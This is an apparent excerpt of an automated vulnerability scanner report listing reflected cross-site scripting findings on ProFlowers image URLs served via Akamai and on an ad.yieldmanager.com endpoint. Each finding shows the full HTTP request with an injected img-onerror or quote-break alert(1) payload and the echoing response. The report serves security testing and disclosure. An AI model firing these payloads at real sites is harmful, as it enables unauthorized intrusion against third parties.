GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_dmsk11_PF3a285<img%20src%3da%20onerror%3dalert(1)>3b6606d8bca?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=300&hei=350 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357?viewpos=1&trackingpgroup=HPM&tile=hmpg_podB&Ref=HomeNoRef&PageSplit=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:49:52 GMT
Connection: close

Unable to find /ProvideCommerce/TUL20hol_dmsk11_PF3a285<img src=a onerror=alert(1)>3b6606d8bca
1.53. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_rbye09CAT_FREV_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_rbye09CAT_FREV_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4695f<img%20src%3da%20onerror%3dalert(1)>bf298cafba7 was submitted in the REST URL parameter 9. This input was echoed as 4695f<img src=a onerror=alert(1)>bf298cafba7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_rbye09CAT_FREV_PF4695f<img%20src%3da%20onerror%3dalert(1)>bf298cafba7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=120&hei=140 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:49:33 GMT
Connection: close

Unable to find /ProvideCommerce/TUL20hol_rbye09CAT_FREV_PF4695f<img src=a onerror=alert(1)>bf298cafba7
1.54. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_control_FC_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_control_FC_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4323c<img%20src%3da%20onerror%3dalert(1)>4e98c60444e was submitted in the REST URL parameter 9. This input was echoed as 4323c<img src=a onerror=alert(1)>4e98c60444e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_control_FC_PF4323c<img%20src%3da%20onerror%3dalert(1)>4e98c60444e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:03 GMT
Connection: close

Unable to find /ProvideCommerce/TUL20hol_sgv09_control_FC_PF4323c<img src=a onerror=alert(1)>4e98c60444e
1.55. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_test_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_test_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ee8b1<img%20src%3da%20onerror%3dalert(1)>e4f2ea6dc57 was submitted in the REST URL parameter 9. This input was echoed as ee8b1<img src=a onerror=alert(1)>e4f2ea6dc57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_test_PFee8b1<img%20src%3da%20onerror%3dalert(1)>e4f2ea6dc57?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:02 GMT
Connection: close

Unable to find /ProvideCommerce/TUL20hol_sgv09_test_PFee8b1<img src=a onerror=alert(1)>e4f2ea6dc57
1.56. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30sweetheart_rdtrmp09_2_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30sweetheart_rdtrmp09_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b6d74<img%20src%3da%20onerror%3dalert(1)>d87e77dd9b7 was submitted in the REST URL parameter 9. This input was echoed as b6d74<img src=a onerror=alert(1)>d87e77dd9b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30sweetheart_rdtrmp09_2_PFb6d74<img%20src%3da%20onerror%3dalert(1)>d87e77dd9b7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 105
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:55 GMT
Connection: close

Unable to find /ProvideCommerce/TUL30sweetheart_rdtrmp09_2_PFb6d74<img src=a onerror=alert(1)>d87e77dd9b7
1.57. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30sweetheart_rdtrmp10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30sweetheart_rdtrmp10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 66259<img%20src%3da%20onerror%3dalert(1)>99e8ab47db7 was submitted in the REST URL parameter 9. This input was echoed as 66259<img src=a onerror=alert(1)>99e8ab47db7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30sweetheart_rdtrmp10_PF66259<img%20src%3da%20onerror%3dalert(1)>99e8ab47db7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:49:33 GMT
Connection: close

Unable to find /ProvideCommerce/TUL30sweetheart_rdtrmp10_PF66259<img src=a onerror=alert(1)>99e8ab47db7
1.58. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/bearwithredbow09_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/bearwithredbow09_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload def66<img%20src%3da%20onerror%3dalert(1)>193b0e5b757 was submitted in the REST URL parameter 9. This input was echoed as def66<img src=a onerror=alert(1)>193b0e5b757 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/bearwithredbow09_SQdef66<img%20src%3da%20onerror%3dalert(1)>193b0e5b757?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 95
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:08 GMT
Connection: close

Unable to find /ProvideCommerce/bearwithredbow09_SQdef66<img src=a onerror=alert(1)>193b0e5b757
1.59. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/holidaychoc07_tn [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/holidaychoc07_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a9cd3<img%20src%3da%20onerror%3dalert(1)>2550109adfe was submitted in the REST URL parameter 9. This input was echoed as a9cd3<img src=a onerror=alert(1)>2550109adfe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/holidaychoc07_tna9cd3<img%20src%3da%20onerror%3dalert(1)>2550109adfe?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 92
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:07 GMT
Connection: close

Unable to find /ProvideCommerce/holidaychoc07_tna9cd3<img src=a onerror=alert(1)>2550109adfe
1.60. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95cdf"-alert(1)-"14e796c9f61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=728x90&section=1333214&95cdf"-alert(1)-"14e796c9f61=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/hubs/hot/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; pv1="b!!!!A!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL!!uiR!!!+J!$>dt!.5=<!$rtW!!!!$!?5%!%R%P3!ZZ<)!%[hn!%nsh~~~~~~<lQj6~~!!0iu!!!/`!$=vN!03UD!$b[P!!!!$!?5%!%R%P3!ZmB)!%Z6*!%Z6<~~~~~~<lR)/~~!#Ic<!+*gd!$e)@!/cMg!%:[h!!!!$!?5%!%nBY4!wVd.!'Cuk!#^3*!'?JV~~~~~<lRY,~~!#N(B!!!+o!$%i1!,Y*D!$dhw!!!!$!?5%!%nBY4!ZZ<)!%X++!%]s!~~~~~~<lRY.<pfD8~!#mP:!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#mP>!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#mPA!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#mPD!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#mPG!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#mPJ!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#LI8!!!$h!#5Qg!0EGL!%<A9!!H<)!?5%!'2BP2!wVd.!$2)w!!j:k!'@?[~~~~~<m,_i<mEWd!!!#G!#LI9!!!$h!#5Qg!0EGL!%<A9!!H<)!?5%!'2BP2!wVd.!$2)w!!j:k!'@?[~~~~~<m,_i<mEWd!!!#G!#p!r!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<m8SQ!!.vL!#p!u!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<m8SQ!!.vL"; ih="b!!!!N!%!-u!!!!#<m9Vb!(4uP!!!!#<m8>D!(4vA!!!!#<kc#t!(mhO!!!!$<lEKI!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/WT!!!!#<m*Y#!+/Wc!!!!#<jbN?!+kS,!!!!#<jbO@!,Y*D!!!!#<lRY.!-6s<!!!!#<m0_5!->h]!!!!%<m#26!-g#y!!!!#<k:[]!.5=<!!!!#<lQj6!.E9F!!!!$<lEIO!.T97!!!!#<k:^)!.`.U!!!!(<mZpq!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/?V,!!!!$<m!WT!/JXx!!!!$<lEWe!/J`3!!!!#<jbND!/S5#!!!!#<m*q.!/cMg!!!!#<lRY,!/cr5!!!!#<kI5G!/o!S!!!!#<m05y!/oCq!!!!'<m8A]!/oD)!!!!#<m!Tu!/pg`!!!!#<mCQ(!/pga!!!!$<m*q+!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!00Gv!!!!#<l`GD!03?y!!!!#<m8Ab!03UD!!!!#<lR)/!08r)!!!!$<lEWx!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0!0C^(!!!!#<m8=j!0EGL!!!!#<m,_i!0LZy!!!!#<m,_`!0L[#!!!!$<m8>B"; vuday1=Gf(n`NFd*luBw.^; bh="b!!!%1!!$ha!!?fS<mZsO!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!*10!!!!%<m#np!!,D(!!!!'<m#np!!-?2!!!!*<m#np!!-G2!!!!$<lise!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!)<m#np!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!%<lmXb!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!(<m#np!!2)5!!!!#<m#np!!2a*!!!!#<ln<2!!4<u!!!!)<m#np!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!7gK!!!!#<lm]6!!<@x!!!!%<lSWC!!<P5!!!!#<m#np!!<P6!!!!#<m#np!!?VS!!DPb<lQiA!!C5(!!!!#<m#np!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L(^!!!!'<m8qE!!L_w!!!!+<m8qE!!MZU!!!!#<lQiC!!Mr(!!ErC<k0fB!!ObA!!!!$<m#np!!ObV!!!!$<m#np!!OgU!!!!(<m#np!!T[J!!!!$<lm]6!!Z-E!!!!$<m#np!!Z-G!!!!$<m#np!!Z-L!!!!$<m#np!!Zw`!!!!%<m#np!!Zwb!!!!'<m#np!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!g[x!!!!#<m#np!!hqJ!!!!#<lP]!!!iEC!!!!'<m#np!!iEb!!!!)<m#np!!i_9!!!!$<m#np!!jD6!!!!#<lja'!!mDJ!!!!#<lQq8!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!qu+!!!!$<lmXb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!ti>!!!!#<m!S_!!u[u!!!!(<lVbU!!utd!!!!(<lVbU!!utl!!!!#<lSD*!!uto!!!!#<lVbU!!uu)!!!!%<lSVZ!!v:e!!!!(<m#np!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!#!vF!!!!#<m*gT!#!vL!!!!#<m*gT!###G!!!!#<lP[k!###_!!!!#<j?lI!##lo!!!!#<jbO@!#')-!!!!#<k2yx!#*<R!!!!%<ln'v!#*VS!!!!#<jLPe!#+]S!!!!(<m#np!#,##!!!!'<lSWC!#-vv!!!!$<iC/K!#.dO!!!!+<m8qE!#/:a!!!!$<lmXf!#/G2!!!!$<m#np!#/G<!!!!$<m#np!#/GO!!!!$<m#np!#/j>!!!!#<m*gT!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#17@!!?fS<mZsO!#1=E!!!!#<kI4S!#2+>!!!!'<lS0M!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3(M!!!!#<m*gT!#3>,!!!!#<lmWu!#3>9!!!!#<lxx`!#3>C!!!!#<lxx]!#3>M!!!!#<lmdr!#3pS!!!!$<lR(Q!#3pv!!!!$<lP]%!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!*<m#np!#8*^!!!!#<mC=k!#8.'!!!!$<lmXe!#8:i!!!!#<jc#c!#8?7!!!!$<lmXb!#8A2!!!!#<k11E!#<T3!!!!#<jbNC!#@7F!!!!#<m8qE!#@wb!!!!#<m*gT!#CC>!!!!#<lS@,!#F1H!!!!'<lS0M!#FGA!!!!%<ln'v!#Fu6!!!!$<lm]6!#Fw_!!!!%<ln'v!#I=D!!!!,<m915!#Ic1!!!!$<lmXc!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#LaM!!!!#<m,_i!#MP0!!!!#<jLPe!#MTC!!!!-<m9Vb!#MTF!!!!-<m9Vb!#MTH!!!!-<m9Vb!#MTI!!!!-<m9Vb!#MTJ!!!!-<m9Vb!#NjS!!!!#<lI#*!#O4F!!!!#<m*gT!#O4I!!!!#<m*gT!#O4M!!!!#<m*gT!#O>M!!DPb<lQiA!#OAV!!DPb<lQiA!#OAW!!DPb<lQiA!#OC2!!!!#<l/M+!#OH-!!!!#<m*gT!#PqQ!!!!#<lI#)!#PrV!!!!#<kQRW!#Q+o!!!!+<m8qE!#Q<o!!!!#<mC=k!#Qh8!!!!#<l.yn!#RSx!!!!#<m*gT!#RY.!!!!'<m8qE!#Ri/!!!!+<m8qE!#Rij!!!!+<m8qE!#SCj!!!!%<m*l:!#SCk!!!!(<m8qG!#SUp!!!!(<m#np!#SVp!!!!#<m*gT!#T#d!!!!#<k2yx!#T,d!!!!#<lR(Q!#TlE!!!!$<lmXe!#TnE!!!!*<m9Vb!#Tnp!!!!$<lmXb!#UDQ!!!!-<m9Vb!#UJ4!!!!#<m*gT!#UJ9!!!!#<m*gT!#UL(!!!!%<lQW%!#VYG!!!!(<mCr1!#V]o!!!!%<mCr1!#V]u!!!!'<mCr1!#V]v!!!!'<mCr1!#W,W!!!!'<mCr1!#W-B!!!!%<mCr1!#W-^!!!!%<mCr1!#W.*!!!!'<mCr1!#W.B!!!!#<m*XR!#W.Q!!!!'<mCr1!#W/5!!!!'<mCr1!#W/A!!!!'<mCr1!#W/J!!!!$<m:Vy!#W^8!!!!#<jem(!#Wb2!!DPb<lQiA!#X)y!!!!#<jem(!#X:Z!!!!#<m*gT!#X]+!!!!'<kdT!!#X]l!!!!'<m8qE!#Zb%!!!!#<m#np!#ZbF!!!!#<m#np!#ZbM!!!!#<m#np!#ZhT!!!!*<m#np!#Zmf!!!!$<kT`F!#[25!!!!%<lhqW!#[L>!!!!%<lise!#]%`!!!!$<m*Yw!#]DN!!!!#<m8qE!#]W%!!!!'<m8qE!#]Z#!!!!#<m#np!#^$?!!!!#<m*gT!#^0$!!!!(<m#np!#^0%!!!!(<m#np!#^Bo!!!!'<m8qE!#^d6!!!!$<m*Yw!#_+6!!!!#<m*gT!#_0t!!!!%<kTb(!#_1L!!!!#<m*gT!#`T=!!!!#<m#np!#`T>!!!!#<m#np!#`TF!!!!#<m#np!#`TG!!!!#<m#np!#`TJ!!!!#<m#np!#`TK!!!!#<m#np!#aCq!!!!'<lisd!#aG>!!!!+<m8qE!#aM'!!!!#<kp_p!#aly!!!!#<m*gT!#av4!!!!$<m!TH!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b?A!!!!#<l.x@!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#cC!!!!!#<ie2`!#dCU!!!!#<m*gT!#e)`!!!!#<m:W!!#e@W!!!!#<k_2)!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#fBj!!!!)<m#np!#fBk!!!!)<m#np!#fBm!!!!)<m#np!#fBn!!!!)<m#np!#fE=!!!!'<lQj,!#fG+!!!!)<m#np!#fJ/!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g/7!!!!(<m#np!#gC:!!!!#<lmdV!#gHO!!!!#<m*gT!#gPp!!!!#<m!TX!#gRx!!!!#<htU3!#g[h!!!!'<m8qE!#g]5!!!!#<lm]?!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#gq`!!!!#<m*gT!#h.N!!!!#<kL2n!#jRq!!!!#<mZv)!#jS>!!!!#<k_Jy!#mJR!!!!#<m8qE!#mP5!!!!$<lise!#